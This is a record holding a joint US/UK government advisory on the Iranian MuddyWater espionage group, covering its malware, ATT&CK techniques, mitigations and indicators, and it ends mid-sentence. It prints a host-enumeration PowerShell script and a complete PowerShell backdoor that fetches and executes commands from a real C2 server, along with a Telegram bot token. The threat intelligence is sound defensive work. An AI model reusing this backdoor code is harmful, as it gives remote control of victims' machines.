{ "id": "0f4f7e1d-df8f-41f5-b5bd-17e2a603f80b", "created_at": "2026-04-06T00:21:32.429196Z", "updated_at": "2026-04-10T13:12:02.490525Z", "deleted_at": null, "sha1_hash": "35d8864336f82a2732edd20ce9e5d9d70bbebc0c", "title": "Iranian Government-Sponsored Actors Conduct Cyber Operations Against Global Government and Commercial Networks | CISA", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 241773, "plain_text": "Iranian Government-Sponsored Actors Conduct Cyber Operations\r\nAgainst Global Government and Commercial Networks | CISA\r\nPublished: 2022-02-24 · Archived: 2026-04-05 13:18:28 UTC\r\nSummary\r\nActions to Take Today to Protect Against Malicious Activity\r\n* Search for indicators of compromise.\r\n* Use antivirus software.\r\n* Patch all systems.\r\n* Prioritize patching known exploited vulnerabilities.\r\n* Train users to recognize and report phishing attempts.\r\n* Use multi-factor authentication.\r\nNote: this advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT\u0026CK®)\r\nframework, version 10. See the ATT\u0026CK for Enterprise for all referenced threat actor tactics and techniques.\r\nThe Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), the U.S.\r\nCyber Command Cyber National Mission Force (CNMF), and the United Kingdom’s National Cyber Security Centre\r\n(NCSC-UK) have observed a group of Iranian government-sponsored advanced persistent threat (APT) actors, known\r\nas MuddyWater, conducting cyber espionage and other malicious cyber operations targeting a range of government\r\nand private-sector organizations across sectors—including telecommunications, defense, local government, and oil\r\nand natural gas—in Asia, Africa, Europe, and North America. Note: MuddyWater is also known as Earth Vetala,\r\nMERCURY, Static Kitten, Seedworm, and TEMP.Zagros.\r\nMuddyWater is a subordinate element within the Iranian Ministry of Intelligence and Security (MOIS).[1] This APT\r\ngroup has conducted broad cyber campaigns in support of MOIS objectives since approximately 2018. MuddyWater\r\nactors are positioned both to provide stolen data and accesses to the Iranian government and to share these with other\r\nmalicious cyber actors.\r\nMuddyWater actors are known to exploit publicly reported vulnerabilities and use open-source tools and strategies to\r\ngain access to sensitive data on victims’ systems and deploy ransomware. These actors also maintain persistence on\r\nvictim networks via tactics such as side-loading dynamic link libraries (DLLs)—to trick legitimate programs into\r\nrunning malware—and obfuscating PowerShell scripts to hide command and control (C2) functions. FBI, CISA,\r\nCNMF, and NCSC-UK have observed MuddyWater actors recently using various malware—variants of PowGoop,\r\nSmall Sieve, Canopy (also known as Starwhale), Mori, and POWERSTATS—along with other tools as part of their\r\nmalicious activity. \r\nThis advisory provides observed tactics, techniques, and procedures (TTPs); malware; and indicators of compromise\r\n(IOCs) associated with this Iranian government-sponsored APT activity to aid organizations in the identification of\r\nmalicious activity against sensitive networks. \r\nhttps://www.cisa.gov/uscert/ncas/alerts/aa22-055a\r\nPage 1 of 17\n\nFBI, CISA, CNMF, NCSC-UK, and the National Security Agency (NSA) recommend organizations apply the\r\nmitigations in this advisory and review the following resources for additional information. Note: also see the\r\nAdditional Resources section.\r\nMalware Analysis Report – MAR-10369127-1.v1: MuddyWater\r\nIOCs – AA22-052A.stix and MAR-10369127-1.v1.stix\r\nCISA's webpage – Iran Cyber Threat Overview and Advisories\r\nNCSC-UK MAR – Small Sieve\r\nCNMF's press release – Iranian intel cyber suite of malware uses open source tools\r\nClick here for a PDF version of this report.\r\nTechnical Details\r\nFBI, CISA, CNMF, and NCSC-UK have observed the Iranian government-sponsored MuddyWater APT group\r\nemploying spearphishing, exploiting publicly known vulnerabilities, and leveraging multiple open-source tools to\r\ngain access to sensitive government and commercial networks. \r\nAs part of its spearphishing campaign, MuddyWater attempts to coax their targeted victim into downloading ZIP files,\r\ncontaining either an Excel file with a malicious macro that communicates with the actor’s C2 server or a PDF file that\r\ndrops a malicious file to the victim’s network [T1566.001 , T1204.002 ]. MuddyWater actors also use techniques\r\nsuch as side-loading DLLs [T1574.002 ] to trick legitimate programs into running malware and obfuscating\r\nPowerShell scripts [T1059.001 ] to hide C2 functions [T1027 ] (see the PowGoop section for more information). \r\nAdditionally, the group uses multiple malware sets—including PowGoop, Small Sieve, Canopy/Starwhale, Mori, and\r\nPOWERSTATS—for loading malware, backdoor access, persistence [TA0003 ], and exfiltration [TA0010 ]. See\r\nbelow for descriptions of some of these malware sets, including newer tools or variants to the group’s suite.\r\nAdditionally, see Malware Analysis Report MAR-10369127.r1.v1: MuddyWater for further details.\r\nPowGoop\r\nMuddyWater actors use new variants of PowGoop malware as their main loader in malicious operations; it consists of\r\na DLL loader and a PowerShell-based downloader. The malicious file impersonates a legitimate file that is signed as a\r\nGoogle Update executable file.\r\nAccording to samples of PowGoop analyzed by CISA and CNMF, PowGoop consists of three components:\r\nA DLL file renamed as a legitimate filename, Goopdate.dll , to enable the DLL side-loading technique\r\n[T1574.002 ]. The DLL file is contained within an executable, GoogleUpdate.exe .\r\nA PowerShell script, obfuscated as a .dat file, goopdate.dat , used to decrypt and run a second obfuscated\r\nPowerShell script, config.txt [T1059.001 ].\r\nconfig.txt , an encoded, obfuscated PowerShell script containing a beacon to a hardcoded IP address.\r\nThese components retrieve encrypted commands from a C2 server. The DLL file hides communications with\r\nMuddyWater C2 servers by executing with the Google Update service. \r\nSmall Sieve\r\nhttps://www.cisa.gov/uscert/ncas/alerts/aa22-055a\r\nPage 2 of 17\n\nAccording to a sample analyzed by NCSC-UK , Small Sieve is a simple Python [T1059.006 ] backdoor\r\ndistributed using a Nullsoft Scriptable Install System (NSIS) installer, gram_app.exe . The NSIS installs the Python\r\nbackdoor, index.exe , and adds it as a registry run key [T1547.001 ], enabling persistence [TA0003 ]. \r\nMuddyWater disguises malicious executables and uses filenames and Registry key names associated with Microsoft's\r\nWindows Defender to avoid detection during casual inspection. The APT group has also used variations of Microsoft\r\n(e.g., \"Microsift\") and Outlook in its filenames associated with Small Sieve [T1036.005 ].\r\nSmall Sieve provides basic functionality required to maintain and expand a foothold in victim infrastructure and\r\navoid detection [TA0005 ] by using custom string and traffic obfuscation schemes together with the Telegram Bot\r\napplication programming interface (API). Specifically, Small Sieve’s beacons and taskings are performed using\r\nTelegram API over Hypertext Transfer Protocol Secure (HTTPS) [T1071.001 ], and the tasking and beaconing data\r\nis obfuscated through a hex byte swapping encoding scheme combined with an obfuscated Base64 function [T1027\r\n], T1132.002 ].\r\nNote: cybersecurity agencies in the United Kingdom and the United States attribute Small Sieve to MuddyWater with\r\nhigh confidence. \r\nSee Appendix B for further analysis of Small Sieve malware.\r\nCanopy\r\nMuddyWater also uses Canopy/Starwhale malware, likely distributed via spearphishing emails with targeted\r\nattachments [T1566.001 ]. According to two Canopy/Starwhale samples analyzed by CISA, Canopy uses Windows\r\nScript File (.wsf) scripts distributed by a malicious Excel file. Note: the cybersecurity agencies of the United\r\nKingdom and the United States attribute these malware samples to MuddyWater with high confidence. \r\nIn the samples CISA analyzed, a malicious Excel file, Cooperation terms.xls , contained macros written in Visual\r\nBasic for Applications (VBA) and two encoded Windows Script Files. When the victim opens the Excel file, they\r\nreceive a prompt to enable macros [T1204.002 ]. Once this occurs, the macros are executed, decoding and installing\r\nthe two embedded Windows Script Files.\r\nThe first .wsf is installed in the current user startup folder [T1547.001 ] for persistence. The file contains\r\nhexadecimal (hex)-encoded strings that have been reshuffled [T1027 ]. The file executes a command to run the\r\nsecond .wsf.\r\nThe second .wsf also contains hex-encoded strings that have been reshuffled. This file collects [TA0035 ] the victim\r\nsystem’s IP address, computer name, and username [T1005 ]. The collected data is then hex-encoded and sent to an\r\nadversary-controlled IP address, http[:]88.119.170[.]124 , via an HTTP POST request [T1041 ].\r\nMori\r\nMuddyWater also uses the Mori backdoor that uses Domain Name System tunneling to communicate with the group’s\r\nC2 infrastructure [T1572 ]. \r\nAccording to one sample analyzed by CISA, FML.dll , Mori uses a DLL written in C++ that is executed with\r\nregsvr32.exe with export DllRegisterServer ; this DLL appears to be a component to another program.\r\nhttps://www.cisa.gov/uscert/ncas/alerts/aa22-055a\r\nPage 3 of 17\n\nFML.dll contains approximately 200MB of junk data [T1001.001 ] in a resource directory 205, number 105. Upon\r\nexecution, FML.dll creates a mutex, 0x50504060 , and performs the following tasks:\r\nDeletes the file FILENAME.old and deletes file by registry value. The filename is the DLL file with a .old\r\nextension.\r\nResolves networking APIs from strings that are ADD-encrypted with the key 0x05 .\r\nUses Base64 and Java Script Object Notation (JSON) based on certain key values passed to the JSON library\r\nfunctions. It appears likely that JSON is used to serialize C2 commands and/or their results.\r\nCommunicates using HTTP over either IPv4 or IPv6, depending on the value of an unidentified flag, for C2\r\n[T1071.001 ].\r\nReads and/or writes data from the following Registry Keys, HKLM\\Software\\NFC\\IPA and\r\nHKLM\\Software\\NFC\\(Default) .\r\nPOWERSTATS\r\nThis group is also known to use the POWERSTATS backdoor, which runs PowerShell scripts to maintain persistent\r\naccess to the victim systems [T1059.001 ]. \r\nCNMF has posted samples further detailing the different parts of MuddyWater’s new suite of tools— along with\r\nJavaScript files used to establish connections back to malicious infrastructure—to the malware aggregation tool and\r\nrepository, Virus Total . Network operators who identify multiple instances of the tools on the same network should\r\ninvestigate further as this may indicate the presence of an Iranian malicious cyber actor.\r\nMuddyWater actors are also known to exploit unpatched vulnerabilities as part of their targeted operations. FBI,\r\nCISA, CNMF, and NCSC-UK have observed this APT group recently exploiting the Microsoft Netlogon elevation of\r\nprivilege vulnerability (CVE-2020-1472 ) and the Microsoft Exchange memory corruption vulnerability (CVE-2020-0688 ). See CISA’s Known Exploited Vulnerabilities Catalog for additional vulnerabilities with known\r\nexploits and joint Cybersecurity Advisory: Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft\r\nExchange and Fortinet Vulnerabilities for additional Iranian APT group-specific vulnerability exploits.\r\nSurvey Script\r\nThe following script is an example of a survey script used by MuddyWater to enumerate information about victim\r\ncomputers. It queries the Windows Management Instrumentation (WMI) service to obtain information about the\r\ncompromised machine to generate a string, with these fields separated by a delimiter (e.g., ;; in this sample). The\r\nproduced string is usually encoded by the MuddyWater implant and sent to an adversary-controlled IP address.\r\n$O = Get-WmiObject Win32_OperatingSystem;$S = $O.Name;$S += \";;\";$ips = \"\";Get-WmiObject\r\nWin32_NetworkAdapterConfiguration -Filter \"IPEnabled=True\" | % {$ips = $ips + \", \" + $_.IPAddress[0]};$S +=\r\n$ips.substring(1);$S += \";;\";$S += $O.OSArchitecture;$S += \";;\";$S +=\r\n[System.Net.DNS]::GetHostByName('').HostName;$S += \";;\";$S += ((Get-WmiObject\r\nWin32_ComputerSystem).Domain);$S += \";;\";$S += $env:UserName;$S += \";;\";$AntiVirusProducts = Get-WmiObject -Namespace \"root\\SecurityCenter2\" -Class AntiVirusProduct  -ComputerName\r\n$env:computername;$resAnti = @();foreach($AntiVirusProduct in $AntiVirusProducts){$resAnti +=\r\n$AntiVirusProduct.displayName};$S += $resAnti;echo $S;\r\nhttps://www.cisa.gov/uscert/ncas/alerts/aa22-055a\r\nPage 4 of 17\n\nNewly Identified PowerShell Backdoor\r\nThe newly identified PowerShell backdoor used by MuddyWater below uses a single-byte Exclusive-OR (XOR) to\r\nencrypt communications with the key 0x02 to adversary-controlled infrastructure. The script is lightweight in\r\nfunctionality and uses the InvokeScript method to execute responses received from the adversary.\r\nfunction encode($txt,$key){$enByte = [Text.Encoding]::UTF8.GetBytes($txt);for($i=0; $i -lt $enByte.count ; $i++)\r\n{$enByte[$i] = $enByte[$i] -bxor $key;}$encodetxt = [Convert]::ToBase64String($enByte);return\r\n$encodetxt;}function decode($txt,$key){$enByte = [System.Convert]::FromBase64String($txt);for($i=0; $i -lt\r\n$enByte.count ; $i++){$enByte[$i] = $enByte[$i] -bxor $key;}$dtxt =\r\n[System.Text.Encoding]::UTF8.GetString($enByte);return $dtxt;}$global:tt=20;while($true){try{$w =\r\n[System.Net.HttpWebRequest]::Create('http://95.181.161.49:80/index.php?id=\u003cvictim identifier\u003e');$w.proxy =\r\n[Net.WebRequest]::GetSystemWebProxy();$r=(New-Object\r\nSystem.IO.StreamReader($w.GetResponse().GetResponseStream())).ReadToEnd();if($r.Length -gt 0){$res=\r\n[string]$ExecutionContext.InvokeCommand.InvokeScript(( decode $r 2));$wr =\r\n[System.Net.HttpWebRequest]::Create('http://95.181.161.49:80/index.php?id=\u003cvictim identifier\u003e');$wr.proxy =\r\n[Net.WebRequest]::GetSystemWebProxy();$wr.Headers.Add('cookie',(encode $res\r\n2));$wr.GetResponse().GetResponseStream();}}catch {}Start-Sleep -Seconds $global:tt;}\r\nMITRE ATT\u0026CK Techniques\r\nMuddyWater uses the ATT\u0026CK techniques listed in table 1.\r\nTable 1: MuddyWater ATT\u0026CK Techniques[2 ]\r\nTechnique Title ID Use\r\nReconnaissance    \r\nGather Victim\r\nIdentity\r\nInformation: Email\r\nAddresses\r\nT1589.002 MuddyWater has specifically targeted government agency employees with\r\nspearphishing emails.\r\nResource\r\nDevelopment\r\n   \r\nAcquire\r\nInfrastructure: Web\r\nServices\r\nT1583.006 MuddyWater has used file sharing services including OneHub to distribute\r\ntools.\r\nObtain Capabilities:\r\nTool\r\nT1588.002 MuddyWater has made use of legitimate tools ConnectWise and\r\nRemoteUtilities for access to target environments.\r\nInitial Access    \r\nPhishing:\r\nSpearphishing\r\nT1566.001 MuddyWater has compromised third parties and used compromised accounts\r\nto send spearphishing emails with targeted attachments. \r\nhttps://www.cisa.gov/uscert/ncas/alerts/aa22-055a\r\nPage 5 of 17\n\nTechnique Title ID Use\r\nAttachment\r\nPhishing:\r\nSpearphishing Link\r\nT1566.002\r\nMuddyWater has sent targeted spearphishing emails with malicious links.\r\nExecution    \r\nWindows\r\nManagement\r\nInstrumentation\r\nT1047\r\nMuddyWater has used malware that leveraged Windows Management\r\nInstrumentation for execution and querying host information.\r\nCommand and\r\nScripting\r\nInterpreter:\r\nPowerShell\r\nT1059.001\r\nMuddyWater has used PowerShell for execution.\r\nCommand and\r\nScripting\r\nInterpreter:\r\nWindows Command\r\nShell\r\n1059.003\r\nMuddyWater has used a custom tool for creating reverse shells.\r\nCommand and\r\nScripting\r\nInterpreter: Visual\r\nBasic\r\nT1059.005 MuddyWater has used Virtual Basic Script (VBS) files to execute its\r\nPOWERSTATS payload, as well as macros.\r\nCommand and\r\nScripting\r\nInterpreter: Python\r\nT1059.006\r\nMuddyWater has used developed tools in Python including Out1. \r\nCommand and\r\nScripting\r\nInterpreter:\r\nJavaScript\r\nT1059.007\r\nMuddyWater has used JavaScript files to execute its POWERSTATS payload.\r\nExploitation for\r\nClient Execution\r\nT1203\r\nMuddyWater has exploited the Office vulnerability CVE-2017-0199 for\r\nexecution.\r\nUser Execution:\r\nMalicious Link\r\nT1204.001 MuddyWater has distributed URLs in phishing emails that link to lure\r\ndocuments.\r\nUser Execution:\r\nMalicious File\r\nT1204.002 MuddyWater has attempted to get users to enable macros and launch\r\nmalicious Microsoft Word documents delivered via spearphishing emails.\r\nInter-Process\r\nCommunication:\r\nT1559.001 MuddyWater has used malware that has the capability to execute malicious\r\ncode via COM, DCOM, and Outlook.\r\nhttps://www.cisa.gov/uscert/ncas/alerts/aa22-055a\r\nPage 6 of 17\n\nTechnique Title ID Use\r\nComponent Object\r\nModel\r\nInter-Process\r\nCommunication:\r\nDynamic Data\r\nExchange\r\nT1559.002 MuddyWater has used malware that can execute PowerShell scripts via\r\nDynamic Data Exchange.\r\nPersistence    \r\nScheduled Task/Job:\r\nScheduled Task\r\nT1053.005\r\nMuddyWater has used scheduled tasks to establish persistence.\r\nOffice Application\r\nStartup: Office\r\nTemplate Macros\r\nT1137.001\r\nMuddyWater has used a Word Template, Normal.dotm , for persistence.\r\nBoot or Logon\r\nAutostart Execution:\r\nRegistry Run Keys /\r\nStartup Folder\r\nT1547.001\r\nMuddyWater has added Registry Run key\r\nKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\SystemTextEncoding\r\nto establish persistence. \r\nPrivilege\r\nEscalation\r\n   \r\nAbuse Elevation\r\nControl Mechanism:\r\nBypass User\r\nAccount Control \r\nT1548.002\r\nMuddyWater uses various techniques to bypass user account control.\r\nCredentials from\r\nPassword Stores\r\nT1555\r\nMuddyWater has performed credential dumping with LaZagne and other\r\ntools, including by dumping passwords saved in victim email.\r\nCredentials from\r\nWeb Browsers\r\nT1555.003 MuddyWater has run tools including Browser64 to steal passwords saved in\r\nvictim web browsers.\r\nDefense Evasion    \r\nObfuscated Files or\r\nInformation\r\nT1027\r\nMuddyWater has used Daniel Bohannon’s Invoke-Obfuscation framework and\r\nobfuscated PowerShell scripts. The group has also used other obfuscation\r\nmethods, including Base64 obfuscation of VBScripts and PowerShell\r\ncommands.\r\nSteganography\r\nT1027.003 MuddyWater has stored obfuscated JavaScript code in an image file named\r\ntemp.jpg .\r\nhttps://www.cisa.gov/uscert/ncas/alerts/aa22-055a\r\nPage 7 of 17\n\nTechnique Title ID Use\r\nCompile After\r\nDelivery\r\nT1027.004 MuddyWater has used the .NET csc.exe tool to compile executables from\r\ndownloaded C# code.\r\nMasquerading:\r\nMatch Legitimate\r\nName or Location\r\nT1036.005\r\nMuddyWater has disguised malicious executables and used filenames and\r\nRegistry key names associated with Windows Defender. E.g., Small Sieve\r\nuses variations of Microsoft (Microsift) and Outlook in its filenames to\r\nattempt to avoid detection during casual inspection.\r\nDeobfuscate/Decode\r\nFiles or Information\r\nT1140\r\nMuddyWater decoded Base64-encoded PowerShell commands using a VBS\r\nfile.\r\nSigned Binary\r\nProxy Execution:\r\nCMSTP\r\nT1218.003 MuddyWater has used CMSTP.exe and a malicious .INF file to execute its\r\nPOWERSTATS payload.\r\nSigned Binary\r\nProxy Execution:\r\nMshta\r\nT1218.005 MuddyWater has used mshta.exe to execute its POWERSTATS payload and\r\nto pass a PowerShell one-liner for execution.\r\nSigned Binary\r\nProxy Execution:\r\nRundll32\r\nT1218.011 MuddyWater has used malware that leveraged rundll32.exe in a Registry\r\nRun key to execute a .dll .\r\nExecution\r\nGuardrails\r\nT1480\r\nThe Small Sieve payload used by MuddyWater will only execute correctly if\r\nthe word “Platypus” is passed to it on the command line.\r\nImpair Defenses:\r\nDisable or Modify\r\nTools\r\nT1562.001\r\nMuddyWater can disable the system's local proxy settings.\r\nCredential Access    \r\nOS Credential\r\nDumping: LSASS\r\nMemory\r\nT1003.001 MuddyWater has performed credential dumping with Mimikatz and\r\nprocdump64.exe .\r\nOS Credential\r\nDumping: LSA\r\nSecrets\r\nT1003.004\r\nMuddyWater has performed credential dumping with LaZagne.\r\nOS Credential\r\nDumping: Cached\r\nDomain Credentials\r\nT1003.005\r\nMuddyWater has performed credential dumping with LaZagne.\r\nhttps://www.cisa.gov/uscert/ncas/alerts/aa22-055a\r\nPage 8 of 17\n\nTechnique Title ID Use\r\nUnsecured\r\nCredentials:\r\nCredentials In Files\r\nT1552.001\r\nMuddyWater has run a tool that steals passwords saved in victim email.\r\nDiscovery     \r\nSystem Network\r\nConfiguration\r\nDiscovery\r\nT1016\r\nMuddyWater has used malware to collect the victim’s IP address and domain\r\nname.\r\nSystem Owner/User\r\nDiscovery\r\nT1033 MuddyWater has used malware that can collect the victim’s username.\r\nSystem Network\r\nConnections\r\nDiscovery\r\nT1049\r\nMuddyWater has used a PowerShell backdoor to check for Skype connections\r\non the target machine.\r\nProcess Discovery T1057\r\nMuddyWater has used malware to obtain a list of running processes on the\r\nsystem.\r\nSystem Information\r\nDiscovery\r\nT1082\r\nMuddyWater has used malware that can collect the victim’s OS version and\r\nmachine name.\r\nFile and Directory\r\nDiscovery\r\nT1083\r\nMuddyWater has used malware that checked if the ProgramData folder had\r\nfolders or files with the keywords \"Kasper,\" \"Panda,\" or \"ESET.\"\r\nAccount Discovery:\r\nDomain Account\r\nT1087.002\r\nMuddyWater has used cmd.exe net user/domain to enumerate domain users.\r\nSoftware Discovery T1518\r\nMuddyWater has used a PowerShell backdoor to check for Skype connectivity\r\non the target machine.\r\nSecurity Software\r\nDiscovery\r\nT1518.001 MuddyWater has used malware to check running processes against a hard-coded list of security tools often used by malware researchers.\r\nCollection    \r\nScreen Capture T1113\r\nMuddyWater has used malware that can capture screenshots of the victim’s\r\nmachine.\r\nArchive Collected\r\nData: Archive via\r\nUtility\r\nT1560.001 MuddyWater has used the native Windows cabinet creation tool,\r\nmakecab.exe , likely to compress stolen data to be uploaded.\r\nCommand and\r\nControl\r\n   \r\nhttps://www.cisa.gov/uscert/ncas/alerts/aa22-055a\r\nPage 9 of 17\n\nTechnique Title ID Use\r\nApplication Layer\r\nProtocol: Web\r\nProtocols\r\nT1071.001 MuddyWater has used HTTP for C2 communications. e.g., Small Sieve\r\nbeacons and tasking are performed using the Telegram API over HTTPS.\r\nProxy: External\r\nProxy\r\nT1090.002\r\nMuddyWater has controlled POWERSTATS from behind a proxy network to\r\nobfuscate the C2 location. \r\nMuddyWater has used a series of compromised websites that victims\r\nconnected to randomly to relay information to C2.\r\nWeb Service:\r\nBidirectional\r\nCommunication\r\nT1102.002 MuddyWater has used web services including OneHub to distribute remote\r\naccess tools.\r\nMulti-Stage\r\nChannels\r\nT1104\r\nMuddyWater has used one C2 to obtain enumeration scripts and monitor web\r\nlogs, but a different C2 to send data back.\r\nIngress Tool\r\nTransfer\r\nT1105\r\nMuddyWater has used malware that can upload additional files to the victim’s\r\nmachine.\r\nData Encoding:\r\nStandard Encoding\r\nT1132.001 MuddyWater has used tools to encode C2 communications including Base64\r\nencoding.\r\nData Encoding:\r\nNon-Standard\r\nEncoding\r\nT1132.002 MuddyWater uses tools such as Small Sieve, which employs a custom hex\r\nbyte swapping encoding scheme to obfuscate tasking traffic.\r\nRemote Access\r\nSoftware\r\nT1219\r\nMuddyWater has used a legitimate application, ScreenConnect, to manage\r\nsystems remotely and move laterally.\r\nExfiltration    \r\nExfiltration Over C2\r\nChannel\r\nT1041 MuddyWater has used C2 infrastructure to receive exfiltrated data.\r\nMitigations\r\nProtective Controls and Architecture\r\nDeploy application control software to limit the applications and executable code that can be run by\r\nusers. Email attachments and files downloaded via links in emails often contain executable code. \r\nIdentity and Access Management\r\nhttps://www.cisa.gov/uscert/ncas/alerts/aa22-055a\r\nPage 10 of 17\n\nUse multifactor authentication where possible, particularly for webmail, virtual private networks, and\r\naccounts that access critical systems.\r\nLimit the use of administrator privileges. Users who browse the internet, use email, and execute code with\r\nadministrator privileges make for excellent spearphishing targets because their system—once infected—\r\nenables attackers to move laterally across the network, gain additional accesses, and access highly sensitive\r\ninformation. \r\nPhishing Protection\r\nEnable antivirus and anti-malware software and update signature definitions in a timely manner. Well-maintained antivirus software may prevent use of commonly deployed attacker tools that are delivered via\r\nspearphishing.\r\nBe suspicious of unsolicited contact via email or social media from any individual you do not know\r\npersonally. Do not click on hyperlinks or open attachments in these communications.\r\nConsider adding an email banner to emails received from outside your organization and disabling\r\nhyperlinks in received emails.\r\nTrain users through awareness and simulations to recognize and report phishing and social engineering\r\nattempts. Identify and suspend access of user accounts exhibiting unusual activity.\r\nAdopt threat reputation services at the network device, operating system, application, and email service\r\nlevels. Reputation services can be used to detect or prevent low-reputation email addresses, files, URLs, and\r\nIP addresses used in spearphishing attacks. \r\nVulnerability and Configuration Management\r\nInstall updates/patch operating systems, software, and firmware as soon as updates/patches are\r\nreleased. Prioritize patching known exploited vulnerabilities.\r\nAdditional Resources\r\nFor more information on Iranian government-sponsored malicious cyber activity, see CISA's webpage – Iran\r\nCyber Threat Overview and Advisories and CNMF's press release – Iranian intel cyber suite of malware uses\r\nopen source tools.\r\nFor information and resources on protecting against and responding to ransomware, refer to\r\nStopRansomware.gov, a centralized, whole-of-government webpage providing ransomware resources and\r\nalerts.\r\nThe joint advisory from the cybersecurity authorities of Australia, Canada, New Zealand, the United Kingdom,\r\nand the United States: Technical Approaches to Uncovering and Remediating Malicious Activity provides\r\nadditional guidance when hunting or investigating a network and common mistakes to avoid in incident\r\nhandling.\r\nCISA offers a range of no-cost cyber hygiene services to help critical infrastructure organizations assess,\r\nidentify, and reduce their exposure to threats, including ransomware. By requesting these services,\r\norganizations of any size could find ways to reduce their risk and mitigate attack vectors.\r\nThe U.S. Department of State’s Rewards for Justice (RFJ) program offers a reward of up to $10 million for\r\nreports of foreign government malicious activity against U.S. critical infrastructure. See the RFJ website for\r\nmore information and how to report information securely.\r\nhttps://www.cisa.gov/uscert/ncas/alerts/aa22-055a\r\nPage 11 of 17\n\nReferences\r\n[1] CNMF Article: Iranian Intel Cyber Suite of Malware Uses Open Source Tools\r\n[2] MITRE ATT\u0026CK: MuddyWater \r\nCaveats\r\nThe information you have accessed or received is being provided “as is” for informational purposes only. The FBI,\r\nCISA, CNMF, and NSA do not endorse any commercial product or service, including any subjects of analysis. Any\r\nreference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or\r\notherwise, does not constitute or imply their endorsement, recommendation, or favoring by the FBI, CISA, CNMF, or\r\nNSA.\r\nPurpose\r\nThis document was developed by the FBI, CISA, CNMF, NCSC-UK, and NSA in furtherance of their respective\r\ncybersecurity missions, including their responsibilities to develop and issue cybersecurity specifications and\r\nmitigations. This information may be shared broadly to reach all appropriate stakeholders. The United States’ NSA\r\nagrees with this attribution and the details provided in this report.\r\nAppendix A: IOCs\r\nThe following IP addresses are associated with MuddyWater activity:\r\n5.199.133[.]149\r\n45.142.213[.]17 \r\n45.142.212[.]61\r\n45.153.231[.]104\r\n46.166.129[.]159\r\n80.85.158[.]49\r\n87.236.212[.]22\r\n88.119.170[.]124\r\n88.119.171[.]213\r\n89.163.252[.]232\r\n95.181.161[.]49\r\n95.181.161[.]50\r\n164.132.237[.]65\r\n185.25.51[.]108\r\n185.45.192[.]228\r\n185.117.75[.]34\r\n185.118.164[.]21\r\n185.141.27[.]143\r\n185.141.27[.]248\r\n185.183.96[.]7\r\n185.183.96[.]44\r\nhttps://www.cisa.gov/uscert/ncas/alerts/aa22-055a\r\nPage 12 of 17\n\n192.210.191[.]188\r\n192.210.226[.]128\r\nAppendix B: Small Sieve\r\nNote: the information contained in this appendix is from NCSC-UK analysis of a Small Sieve sample.\r\nMetadata\r\nTable 2: Gram.app.exe Metadata\r\nFilename gram_app.exe \r\nDescription NSIS installer that installs and runs the index.exe backdoor and adds a persistence registry key \r\nSize 16999598 bytes \r\nMD5 15fa3b32539d7453a9a85958b77d4c95 \r\nSHA-1 11d594f3b3cf8525682f6214acb7b7782056d282 \r\nSHA-256 b75208393fa17c0bcbc1a07857686b8c0d7e0471d00a167a07fd0d52e1fc9054 \r\nCompile Time 2021-09-25 21:57:46 UTC \r\nTable 3: Index.exe Metadata\r\nFilename  index.exe \r\nDescription The final PyInstaller-bundled Python 3.9 backdoor \r\nSize 17263089 bytes \r\nMD5 5763530f25ed0ec08fb26a30c04009f1 \r\nSHA-1 2a6ddf89a8366a262b56a251b00aafaed5321992 \r\nSHA-256 bf090cf7078414c9e157da7002ca727f06053b39fa4e377f9a0050f2af37d3a2  \r\nCompile Time 2021-08-01 04:39:46 UTC \r\nFunctionality \r\nInstallation \r\nSmall Sieve is distributed as a large (16MB) NSIS installer named gram_app.exe , which does not appear to\r\nmasquerade as a legitimate application. Once executed, the backdoor binary index.exe is installed in the user’s\r\nAppData/Roaming directory and is added as a Run key in the registry to enabled persistence after reboot. \r\nhttps://www.cisa.gov/uscert/ncas/alerts/aa22-055a\r\nPage 13 of 17\n\nThe installer then executes the backdoor with the “Platypus” argument [T1480 ], which is also present in the\r\nregistry persistence key: HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\OutlookMicrosift . \r\nConfiguration \r\nThe backdoor attempts to restore previously initialized session data from\r\n%LocalAppData%\\MicrosoftWindowsOutlookDataPlus.txt . \r\nIf this file does not exist, then it uses the hardcoded values listed in table 4:\r\nTable 4: Credentials and Session Values\r\nField  Value Description\r\nChat ID 2090761833 \r\nThis is the Telegram Channel ID that beacons\r\nare sent to, and, from which, tasking requests\r\nare received. Tasking requests are dropped if\r\nthey do not come from this channel. This\r\nvalue cannot be changed. \r\nBot ID\r\nRandom value between 10,000,000 and\r\n90,000,000 \r\nThis is a bot identifier generated at startup that\r\nis sent to the C2 in the initial beacon.\r\nCommands must be prefixed with /com[Bot\r\nID] in order to be processed by the malware.\r\nTelegram\r\nToken \r\n2003026094:\r\nAAGoitvpcx3SFZ2_6YzIs4La_kyDF1PbXrY \r\nThis is the initial token used to authenticate\r\neach message to the Telegram Bot API.\r\nTasking \r\nSmall Sieve beacons via the Telegram Bot API, sending the configured Bot ID, the currently logged-in user, and the\r\nhost’s IP address, as described in the Communications (Beacon format) section below. It then waits for tasking as a\r\nTelegram bot using the python-telegram-bot module. \r\nTwo task formats are supported: \r\n/start – no argument is passed; this causes the beacon information to be repeated.\r\n/com[BotID] [command] – for issuing commands passed in the argument. \r\nThe following commands are supported by the second of these formats, as described in table 5: \r\nTable 5: Supported Commands\r\nCommand Description\r\ndelete  This command causes the backdoor to exit; it does not remove persistence. \r\nhttps://www.cisa.gov/uscert/ncas/alerts/aa22-055a\r\nPage 14 of 17\n\nCommand Description\r\ndownload\r\nurl””filename \r\nThe URL will be fetched and saved to the provided filename using the Python urllib\r\nmodule urlretrieve function.  \r\nchange\r\ntoken””newtoken \r\nThe backdoor will reconnect to the Telegram Bot API using the provided token\r\nnewtoken . This updated token will be stored in the encoded\r\nMicrosoftWindowsOutlookDataPlus.txt file. \r\ndisconnect \r\nThe original connection to Telegram is terminated. It is likely used after a change\r\ntoken command is issued. \r\nAny commands other than those detailed in table 5 are executed directly by passing them to cmd.exe /c , and the\r\noutput is returned as a reply.\r\nDefense Evasion \r\nAnti-Sandbox \r\nFigure 1: Execution Guardrail\r\nThreat actors may be attempting to thwart simple analysis by not passing “Platypus” on the command line. \r\nString obfuscation \r\nInternal strings and new Telegram tokens are stored obfuscated with a custom 